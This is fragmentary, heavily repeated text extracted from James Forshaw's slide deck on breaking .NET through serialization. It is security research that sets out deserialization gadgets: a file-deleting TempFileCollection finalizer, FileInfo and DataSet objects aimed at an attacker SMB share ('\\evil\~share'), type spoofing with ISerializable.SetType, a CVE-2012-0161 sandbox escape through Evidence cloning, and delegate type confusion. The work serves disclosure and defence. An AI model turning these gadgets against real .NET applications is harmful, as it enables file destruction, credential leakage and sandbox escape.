Professional Documents
Culture Documents
James Forshaw's Are You My Type? Breaking .NET Through Serialization?
James Forshaw's Are You My Type? Breaking .NET Through Serialization?
James Forshaw
JSON 3.5
[Serializable]
class SerializableClass
{
public string SomeValue;
}
[Serializable]
class SerializableClass
{
public string SomeValue;
}
fmt.Serialize(stm, o);
return stm.ToArray();
}
Library
Name
Type
Name
Field
Name
Value
// ...
}
// ...
} Store value in
Dictionary
// ...
// ...
[Serializable]
public class TempFileCollection
{
private Hashtable files;
// Other stuff...
~TempFileCollection()
{
foreach (string file in files.Keys)
{
File.Delete(file);
}
}
}
[Serializable]
public class TempFileCollection
{
private Hashtable files; Deserialized list of files
// Other stuff...
~TempFileCollection()
{
foreach (string file in files.Keys)
{
File.Delete(file);
}
}
}
[Serializable]
public class TempFileCollection
{
private Hashtable files; Deserialized list of files
// Other stuff...
~TempFileCollection()
{
foreach (string file in files.Keys)
{
Makes sure to delete
File.Delete(file);
them when object
}
destroyed!
}
}
AppDomain AppDomain
Well Known
Service
AppDomain AppDomain
RemObject.DoWork(a)
Well Known
Service
AppDomain AppDomain
RemObject.DoWork(a)
Well Known
Service
RemObject.DoWork(a)
Well Known
Service
RemObject.DoWork(a)
Well Known
Service
RemObject.DoWork(a)
Well Known
Service
RemObject.DoWork(a)
Well Known
Service
Marshal By
Reference
Object
RemObject.DoWork(a) Transparent
Proxy
Well Known
Service
ObjRef
Marshal By
Reference
Object
RemObject.DoWork(a) Transparent
Proxy
Well Known
Service
ObjRef
Marshal By
Reference
Object
RemObject.DoWork(a)
Well Known
Service
Serializable
Object
RemObject.DoWork(a)
Well Known
Service
Serializable
Object
RemObject.DoWork(a) Serializable
Object
Well Known
Service
Serializable
Object
[Serializable]
public class FileInfo
{
private string FullPath;
[Serializable]
public class FileInfo
{
private string FullPath;
FileInfo
\\evil\~share
FileInfo
\\evil\~share
FileInfo
\\evil\~share
DataSet
DataSet
DataSet
DataSet
DataSet
SMB \\evil\~share
DataSet
DataSet
Host AppDomain
Host Class
Host Class
Host Class
Untrusted
Class
Host Class
Untrusted
Class
Host Class
Untrusted
Class
Host Class
throw ex;
throw ex;
• Fixed as CVE-2012-0161
throw ex;
• Fixed as CVE-2012-0161
• Fixed as CVE-2012-0161
[Serializable]
class CustomSerializableClass : ISerializable
{
public void GetObjectData(SerializationInfo info,
StreamingContext context)
{
// Change our type to something else!
info.SetType(typeof(FileInfo));
info.AddValue("OriginalPath", @"\\server\~share");
}
}
[Serializable]
class CustomSerializableClass : ISerializable
{
public void GetObjectData(SerializationInfo info,
StreamingContext context)
{
// Change our type to something else! Deserialize as an
info.SetType(typeof(FileInfo)); unrelated type
info.AddValue("OriginalPath", @"\\server\~share");
}
}
[Serializable]
class CustomSerializableClass : ISerializable
{
public void GetObjectData(SerializationInfo info,
StreamingContext context)
{
// Change our type to something else! Deserialize as an
info.SetType(typeof(FileInfo)); unrelated type
info.AddValue("OriginalPath", @"\\server\~share");
}
} Fake serialization data
Exception
Exception
Exception Exception
[SecurityPermission(SecurityAction.Assert,
SerializationFormatter = true)]
public virtual EvidenceBase Clone()
{
using (MemoryStream stream = new MemoryStream())
{
BinaryFormatter formatter = new BinaryFormatter();
formatter.Serialize(stream, this);
stream.Position = 0L;
return formatter.Deserialize(stream) as EvidenceBase;
}
}
[SecurityPermission(SecurityAction.Assert, Oh Dear!
SerializationFormatter = true)]
public virtual EvidenceBase Clone()
{
using (MemoryStream stream = new MemoryStream())
{
BinaryFormatter formatter = new BinaryFormatter();
formatter.Serialize(stream, this);
stream.Position = 0L;
return formatter.Deserialize(stream) as EvidenceBase;
}
}
MyEvidenceBase
PT AppDomain
MyEvidenceBase
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine(
new MyDelegatePtr(DoSomethingPtr),
new MyDelegatePtr(DoSomethingPtr));
d(new IntPtr(0x12345678));
}
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine( Combine two
new MyDelegatePtr(DoSomethingPtr), delegates together
new MyDelegatePtr(DoSomethingPtr));
d(new IntPtr(0x12345678));
}
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine( Combine two
new MyDelegatePtr(DoSomethingPtr), delegates together
new MyDelegatePtr(DoSomethingPtr));
Calls DoSomethingPtr twice
d(new IntPtr(0x12345678));
with the same parameter
}
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine( Combine two
new MyDelegatePtr(DoSomethingPtr), delegates together
new MyDelegatePtr(DoSomethingPtr));
Calls DoSomethingPtr twice
d(new IntPtr(0x12345678));
with the same parameter
}
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine(
new MyDelegatePtr(DoSomethingPtr),
new MyDelegateStr(DoSomethingStr));
d(new IntPtr(0x12345678));
}
public RunDelegate()
{
MyDelegatePtr d = Delegate.Combine( Combination fails
new MyDelegatePtr(DoSomethingPtr), with an Exception
new MyDelegateStr(DoSomethingStr));
d(new IntPtr(0x12345678));
}
public RunDelegate()
{
// Get a delegate combining IntPtr and String types
MyDelegatePtr d = GetSerializedDelegate();
d(new IntPtr(0x12345678));
}
public RunDelegate()
{
// Get a delegate combining IntPtr and String types
MyDelegatePtr d = GetSerializedDelegate();
0:000> !clrstack
OS Thread Id: 0x12a0 (0)
Child SP IP Call Site
0024eaac 002f09fb Demo.DoSomethingStr(System.String)
0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr)
0024eaf4 002f054b Demo.DoTypeConfusion()
0:000> !clrstack
OS Thread Id: 0x12a0 (0)
Child SP IP Call Site
0024eaac 002f09fb Demo.DoSomethingStr(System.String)
0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr)
0024eaf4 002f054b Demo.DoTypeConfusion()
MyEquality
Comparer
Hashtable
MyEquality
Comparer
Hashtable
MyEquality
Comparer
Hashtable Hashtable
Call GetHashCode
passing back each
Key MyEquality
Comparer
Hashtable Hashtable
• Email: whitepapers@contextis.com
• WWW: http://www.contextis.com